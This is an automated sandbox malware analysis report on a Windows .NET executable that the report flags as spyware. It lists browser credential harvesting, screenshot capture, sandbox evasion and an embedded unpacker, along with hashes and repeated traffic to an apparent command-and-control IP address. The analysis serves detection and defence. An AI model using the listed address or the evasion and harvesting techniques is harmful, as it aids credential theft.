Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:895395
MD5:ccbba2aac1cae3a0bd29cb42203e20b4
SHA1:fc43185094768f22e4857f09cf902e4ab8b1ce57
SHA256:3cd8941da73295f75980a8c38d92902b378614aabddfb395121cbc1724abce22
Tags:exe
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Found evasive API chain (may stop execution after checking mutex)
.NET source code contains very large strings
Machine Learning detection for sample
Found API chain indicative of sandbox detection
Tries to harvest and steal browser information (history, passwords, etc)
.NET source code contains potential unpacker
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
May sleep (evasive loops) to hinder dynamic analysis
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to detect sandboxes (mouse cursor move detection)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Contains long sleeps (>= 3 min)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2376 cmdline: C:\Users\user\Desktop\file.exe MD5: CCBBA2AAC1CAE3A0BD29CB42203E20B4)
    • file.exe (PID: 5608 cmdline: C:\Users\user\Desktop\file.exe MD5: CCBBA2AAC1CAE3A0BD29CB42203E20B4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: file.exeReversingLabs: Detection: 37%
Source: file.exeVirustotal: Detection: 42%Perma Link
Machine Learning detection for sample
Source: file.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00401C87 CryptUnprotectData,CryptProtectData,3_2_00401C87
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: WZSG.pdb source: file.exe
Source: Binary string: WZSG.pdbSHA256d source: file.exe
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00401000 FindFirstFileW,FindNextFileW,EnterCriticalSection,LeaveCriticalSection,3_2_00401000
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00401D2F FindFirstFileW,FindNextFileW,3_2_00401D2F
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00404ABC FindFirstFileW,EnterCriticalSection,LeaveCriticalSection,FindNextFileW,3_2_00404ABC
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00404068 FindFirstFileW,FindNextFileW,3_2_00404068
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00403EAA FindFirstFileW,FindNextFileW,3_2_00403EAA
Source: global trafficTCP traffic: 192.168.2.4:49692 -> 89.238.170.240:2227
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: unknownTCP traffic detected without corresponding DNS query: 89.238.170.240
Source: file.exe, 00000000.00000003.540784331.000000000597E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://en.wikip
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: file.exe, 00000000.00000003.541494170.0000000005973000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
Source: file.exe, 00000000.00000003.541494170.0000000005973000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comMic
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: file.exe, 00000000.00000003.541494170.0000000005973000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comsio
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
Source: file.exe, 00000000.00000003.550366748.0000000005973000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comceTF
Source: file.exe, 00000000.00000003.555478821.0000000005970000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.550366748.0000000005973000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como
Source: file.exe, 00000000.00000003.555478821.0000000005970000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.550366748.0000000005973000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.561708269.0000000005978000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comoitu
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
Source: file.exe, 00000000.00000003.541122156.000000000597C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541188088.000000000597C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: file.exe, 00000000.00000003.541188088.000000000597C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/-cz
Source: file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/?
Source: file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Sue
Source: file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/WebdA
Source: file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0-f
Source: file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/&
Source: file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/H
Source: file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/S
Source: file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/l
Source: file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/r
Source: file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/t-i
Source: file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/~
Source: file.exe, 00000000.00000003.546481873.00000000059A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.T
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: file.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: file.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: file.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: file.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000002.555824287.0000000000CCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00404868 GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetDC,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateDIBSection,SelectObject,BitBlt,DeleteObject,DeleteDC,ReleaseDC,3_2_00404868

System Summary

barindex
.NET source code contains very large strings
Source: file.exe, frmMatHang.csLong String: Length: 51642
Source: 0.0.file.exe.6f0000.0.unpack, frmMatHang.csLong String: Length: 51642
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe, 00000000.00000000.537841104.00000000006F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWZSG.exeB vs file.exe
Source: file.exe, 00000000.00000002.557276043.0000000002B43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCreet.dll< vs file.exe
Source: file.exe, 00000000.00000002.561529268.0000000005300000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCreet.dll< vs file.exe
Source: file.exe, 00000000.00000002.564053142.0000000007300000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs file.exe
Source: file.exe, 00000000.00000002.558620337.0000000003B29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs file.exe
Source: file.exe, 00000000.00000002.555824287.0000000000CCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000002.557276043.0000000002BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCreet.dll< vs file.exe
Source: file.exeBinary or memory string: OriginalFilenameWZSG.exeB vs file.exe
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02A9C1D40_2_02A9C1D4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02A9E6080_2_02A9E608
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02A9E6180_2_02A9E618
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_072F04480_2_072F0448
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_072F12080_2_072F1208
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exeReversingLabs: Detection: 37%
Source: file.exeVirustotal: Detection: 42%
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\e9ad4a13-a667-4534-bcfa-4791968c5e00
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
Source: classification engineClassification label: mal72.spyw.evad.winEXE@3/1@0/1
Source: file.exe, 00000003.00000002.632327918.000000000C818000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.602999334.000000000AA88000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.611827518.000000000B1E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.615477363.000000000B50F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: WZSG.pdb source: file.exe
Source: Binary string: WZSG.pdbSHA256d source: file.exe

Data Obfuscation

barindex
.NET source code contains potential unpacker
Source: file.exe, frmMatHang.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.file.exe.6f0000.0.unpack, frmMatHang.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: file.exeStatic PE information: 0xA1B089DF [Sat Dec 18 00:10:07 2055 UTC]
Source: initial sampleStatic PE information: section name: .text entropy: 7.48667005978947
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\Desktop\file.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_3-2216
Found API chain indicative of sandbox detection
Source: C:\Users\user\Desktop\file.exeSandbox detection routine: GetCursorPos, DecisionNode, Sleepgraph_3-2301
Source: C:\Users\user\Desktop\file.exe TID: 992Thread sleep time: -39697s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5744Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: GetCursorPos,GetCursorPos,Sleep,3_2_00402192
Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040202A GetCurrentHwProfileA,GetSystemInfo,EnumDisplayDevicesA,EnumDisplayDevicesA,3_2_0040202A
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00401000 FindFirstFileW,FindNextFileW,EnterCriticalSection,LeaveCriticalSection,3_2_00401000
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00401D2F FindFirstFileW,FindNextFileW,3_2_00401D2F
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00404ABC FindFirstFileW,EnterCriticalSection,LeaveCriticalSection,FindNextFileW,3_2_00404ABC
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00404068 FindFirstFileW,FindNextFileW,3_2_00404068
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00403EAA FindFirstFileW,FindNextFileW,3_2_00403EAA
Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 39697Jump to behavior
Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: file.exe, 00000003.00000002.632995633.000000000C89C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.613121105.000000000B222000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 